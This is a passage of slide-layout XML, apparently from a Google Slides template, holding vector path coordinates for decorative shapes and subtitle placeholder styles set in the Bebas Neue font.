                    <a:pt x="1555" y="6428"/>
                    <a:pt x="1680" y="6428"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1755" y="6428"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1931" y="6378"/>
                    <a:pt x="2031" y="6227"/>
                    <a:pt x="2006" y="6052"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="653" y="237"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="610" y="110"/>
                    <a:pt x="47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8623363" y="4301955"/>
              <a:ext cx="60380" cy="108087"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3335" h="5970" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2985" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2871" y="0"/>
                    <a:pt x="2763" y="70"/>
                    <a:pt x="2708" y="180"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="76" y="5519"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="5669"/>
                    <a:pt x="51" y="5870"/>
                    <a:pt x="201" y="5945"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="252" y="5970"/>
                    <a:pt x="302" y="5970"/>
                    <a:pt x="352" y="5970"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="477" y="5970"/>
                    <a:pt x="577" y="5920"/>
                    <a:pt x="627" y="5794"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3259" y="456"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3334" y="306"/>
                    <a:pt x="3259" y="105"/>
                    <a:pt x="3109" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3068" y="10"/>
                    <a:pt x="3026" y="0"/>
                    <a:pt x="2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9016004" y="2994926"/>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6675935" y="4695309"/>
              <a:ext cx="59475" cy="59457"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3285" h="3284" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1655" y="627"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2206" y="627"/>
                    <a:pt x="2657" y="1103"/>
                    <a:pt x="2657" y="1654"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2657" y="2206"/>
                    <a:pt x="2206" y="2657"/>
                    <a:pt x="1655" y="2657"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1079" y="2657"/>
                    <a:pt x="627" y="2206"/>
                    <a:pt x="627" y="1654"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="627" y="1103"/>
                    <a:pt x="1079" y="627"/>
                    <a:pt x="1655" y="627"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1655" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="753" y="0"/>
                    <a:pt x="1" y="752"/>
                    <a:pt x="1" y="1654"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="2556"/>
                    <a:pt x="753" y="3283"/>
                    <a:pt x="1655" y="3283"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2557" y="3283"/>
                    <a:pt x="3284" y="2556"/>
                    <a:pt x="3284" y="1654"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3284" y="752"/>
                    <a:pt x="2557" y="0"/>
                    <a:pt x="1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a:off x="8736973" y="19643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a:off x="9121267" y="3702904"/>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a:off x="8431104" y="5120924"/>
              <a:ext cx="22704" cy="22577"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1254" h="1247" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="615" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="452" y="0"/>
                    <a:pt x="289" y="56"/>
                    <a:pt x="176" y="169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="294"/>
                    <a:pt x="0" y="445"/>
                    <a:pt x="0" y="620"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="771"/>
                    <a:pt x="51" y="946"/>
                    <a:pt x="176" y="1071"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="301" y="1172"/>
                    <a:pt x="452" y="1247"/>
                    <a:pt x="627" y="1247"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="777" y="1247"/>
                    <a:pt x="928" y="1172"/>
                    <a:pt x="1053" y="1071"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1178" y="946"/>
                    <a:pt x="1254" y="771"/>
                    <a:pt x="1254" y="620"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1254" y="445"/>
                    <a:pt x="1178" y="294"/>
                    <a:pt x="1053" y="169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="940" y="56"/>
                    <a:pt x="777" y="0"/>
                    <a:pt x="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9034598" y="1818952"/>
              <a:ext cx="22722" cy="22993"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1255" h="1270" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="603" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="446" y="0"/>
                    <a:pt x="295" y="72"/>
                    <a:pt x="176" y="191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="216"/>
                    <a:pt x="126" y="241"/>
                    <a:pt x="101" y="292"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="317"/>
                    <a:pt x="51" y="342"/>
                    <a:pt x="51" y="392"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="417"/>
                    <a:pt x="1" y="467"/>
                    <a:pt x="1" y="517"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="542"/>
                    <a:pt x="1" y="592"/>
                    <a:pt x="1" y="642"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="793"/>
                    <a:pt x="51" y="968"/>
                    <a:pt x="176" y="1069"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="302" y="1194"/>
                    <a:pt x="452" y="1269"/>
                    <a:pt x="628" y="1269"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="653" y="1269"/>
                    <a:pt x="703" y="1244"/>
                    <a:pt x="728" y="1244"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="778" y="1244"/>
                    <a:pt x="828" y="1219"/>
                    <a:pt x="853" y="1219"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="903" y="1194"/>
                    <a:pt x="928" y="1169"/>
                    <a:pt x="953" y="1144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1003" y="1119"/>
                    <a:pt x="1029" y="1094"/>
                    <a:pt x="1054" y="1069"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1179" y="968"/>
                    <a:pt x="1254" y="793"/>
                    <a:pt x="1254" y="642"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1254" y="592"/>
                    <a:pt x="1229" y="542"/>
                    <a:pt x="1229" y="517"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1229" y="467"/>
                    <a:pt x="1204" y="417"/>
                    <a:pt x="1204" y="392"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1179" y="342"/>
                    <a:pt x="1154" y="317"/>
                    <a:pt x="1129" y="292"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1104" y="241"/>
                    <a:pt x="1079" y="216"/>
                    <a:pt x="1054" y="191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1029" y="166"/>
                    <a:pt x="1003" y="141"/>
                    <a:pt x="953" y="116"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="928" y="91"/>
                    <a:pt x="903" y="66"/>
                    <a:pt x="853" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="828" y="41"/>
                    <a:pt x="778" y="16"/>
                    <a:pt x="728" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="686" y="5"/>
                    <a:pt x="644" y="0"/>
                    <a:pt x="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8700096" y="3562403"/>
              <a:ext cx="55383" cy="54007"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3059" h="2983" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2707" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2626" y="0"/>
                    <a:pt x="2544" y="25"/>
                    <a:pt x="2482" y="75"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="126" y="2456"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2582"/>
                    <a:pt x="0" y="2782"/>
                    <a:pt x="126" y="2907"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="2958"/>
                    <a:pt x="251" y="2983"/>
                    <a:pt x="351" y="2983"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="427" y="2983"/>
                    <a:pt x="502" y="2958"/>
                    <a:pt x="552" y="2907"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2933" y="527"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3058" y="401"/>
                    <a:pt x="3058" y="201"/>
                    <a:pt x="2933" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2870" y="25"/>
                    <a:pt x="2789" y="0"/>
                    <a:pt x="2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8578586" y="13822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a:off x="8996935" y="112825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7009060" y="4948847"/>
              <a:ext cx="59475" cy="59457"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3285" h="3284" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1655" y="627"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2206" y="627"/>
                    <a:pt x="2657" y="1103"/>
                    <a:pt x="2657" y="1654"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2657" y="2206"/>
                    <a:pt x="2206" y="2657"/>
                    <a:pt x="1655" y="2657"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1079" y="2657"/>
                    <a:pt x="627" y="2206"/>
                    <a:pt x="627" y="1654"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="627" y="1103"/>
                    <a:pt x="1079" y="627"/>
                    <a:pt x="1655" y="627"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1655" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="753" y="0"/>
                    <a:pt x="1" y="752"/>
                    <a:pt x="1" y="1654"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="2556"/>
                    <a:pt x="753" y="3283"/>
                    <a:pt x="1655" y="3283"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2557" y="3283"/>
                    <a:pt x="3284" y="2556"/>
                    <a:pt x="3284" y="1654"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3284" y="752"/>
                    <a:pt x="2557" y="0"/>
                    <a:pt x="1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7479167" y="5018542"/>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5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8424000" y="4807625"/>
            <a:ext cx="425883" cy="216100"/>
            <a:chOff x="259675" y="4807625"/>
            <a:chExt cx="425883" cy="216100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="74" name="Google Shape;74;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="538673" y="4807625"/>
              <a:ext cx="146885" cy="216100"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3510" h="5164" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2131" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="5164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1379" y="5164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35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flipH="1">
              <a:off x="399195" y="4807625"/>
              <a:ext cx="145797" cy="216100"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3484" h="5164" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2105" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="5164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1353" y="5164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34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flipH="1">
              <a:off x="259675" y="4807625"/>
              <a:ext cx="145839" cy="216100"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3485" h="5164" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2131" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="5164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1379" y="5164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34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5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="-5400000" flipH="1">
            <a:off x="-1086325" y="839075"/>
            <a:ext cx="2758303" cy="193976"/>
            <a:chOff x="-344350" y="4817800"/>
            <a:chExt cx="2758303" cy="193976"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="78" name="Google Shape;78;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1676492" y="4830170"/>
              <a:ext cx="92660" cy="91419"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1880" h="1855" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1880" y="1855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18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1993939" y="4830170"/>
              <a:ext cx="91428" cy="91419"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1855" h="1855" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1855" y="1855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18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2299014" y="4817800"/>
              <a:ext cx="114938" cy="114927"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2332" h="2332" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1880" y="477"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1880" y="1880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452" y="1880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452" y="477"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="226" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="1"/>
                    <a:pt x="1" y="126"/>
                    <a:pt x="1" y="251"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="2106"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="2231"/>
                    <a:pt x="101" y="2331"/>
                    <a:pt x="226" y="2331"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2106" y="2331"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2231" y="2331"/>
                    <a:pt x="2332" y="2231"/>
                    <a:pt x="2332" y="2106"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2332" y="251"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2332" y="126"/>
                    <a:pt x="2231" y="1"/>
                    <a:pt x="2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p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-344350" y="4864717"/>
              <a:ext cx="2033307" cy="147059"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="41254" h="2984" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="31229" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="31179" y="1"/>
                    <a:pt x="31103" y="26"/>
                    <a:pt x="31078" y="76"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="28622" y="2507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226" y="2507"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="2507"/>
                    <a:pt x="0" y="2633"/>
                    <a:pt x="0" y="2758"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2883"/>
                    <a:pt x="101" y="2983"/>
                    <a:pt x="226" y="2983"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="28722" y="2983"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="28772" y="2983"/>
                    <a:pt x="28848" y="2958"/>
                    <a:pt x="28898" y="2908"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="31329" y="477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41028" y="477"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="41154" y="477"/>
                    <a:pt x="41254" y="352"/>
                    <a:pt x="41254" y="227"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41254" y="101"/>
                    <a:pt x="41154" y="1"/>
                    <a:pt x="41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p5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1354425" y="2858750"/>
            <a:ext cx="2518500" cy="3621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lt2"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Bebas Neue"/>
              <a:buNone/>
              <a:defRPr sz="2200">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Bebas Neue"/>
                <a:ea typeface="Bebas Neue"/>
                <a:cs typeface="Bebas Neue"/>
                <a:sym typeface="Bebas Neue"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt2"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Bebas Neue"/>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Bebas Neue"/>
                <a:ea typeface="Bebas Neue"/>
                <a:cs typeface="Bebas Neue"/>
                <a:sym typeface="Bebas Neue"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt2"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Bebas Neue"/>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Bebas Neue"/>
                <a:ea typeface="Bebas Neue"/>
                <a:cs typeface="Bebas Neue"/>
                <a:sym typeface="Bebas Neue"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt2"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Bebas Neue"/>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Bebas Neue"/>
                <a:ea typeface="Bebas Neue"/>
                <a:cs typeface="Bebas Neue"/>
                <a:sym typeface="Bebas Neue"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt2"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Bebas Neue"/>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Bebas Neue"/>
                <a:ea typeface="Bebas Neue"/>
                <a:cs typeface="Bebas Neue"/>
                <a:sym typeface="Bebas Neue"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt2"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Bebas Neue"/>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Bebas Neue"/>
                <a:ea typeface="Bebas Neue"/>
                <a:cs typeface="Bebas Neue"/>
                <a:sym typeface="Bebas Neue"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt2"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Bebas Neue"/>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Bebas Neue"/>
                <a:ea typeface="Bebas Neue"/>
                <a:cs typeface="Bebas Neue"/>
                <a:sym typeface="Bebas Neue"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt2"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Bebas Neue"/>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Bebas Neue"/>
                <a:ea typeface="Bebas Neue"/>
                <a:cs typeface="Bebas Neue"/>
                <a:sym typeface="Bebas Neue"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt2"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Bebas Neue"/>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Bebas Neue"/>
                <a:ea typeface="Bebas Neue"/>
                <a:cs typeface="Bebas Neue"/>
                <a:sym typeface="Bebas Neue"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Google Shape;83;p5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1354425" y="3252350"/>
            <a:ext cx="2518500" cy="8634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84" name="Google Shape;84;p5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5271100" y="2858750"/>
            <a:ext cx="2518500" cy="3621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lt2"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Bebas Neue"/>
              <a:buNone/>
              <a:defRPr sz="2200">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Bebas Neue"/>
                <a:ea typeface="Bebas Neue"/>
                <a:cs typeface="Bebas Neue"/>
                <a:sym typeface="Bebas Neue"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt2"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Bebas Neue"/>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Bebas Neue"/>
                <a:ea typeface="Bebas Neue"/>
                <a:cs typeface="Bebas Neue"/>
                <a:sym typeface="Bebas Neue"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
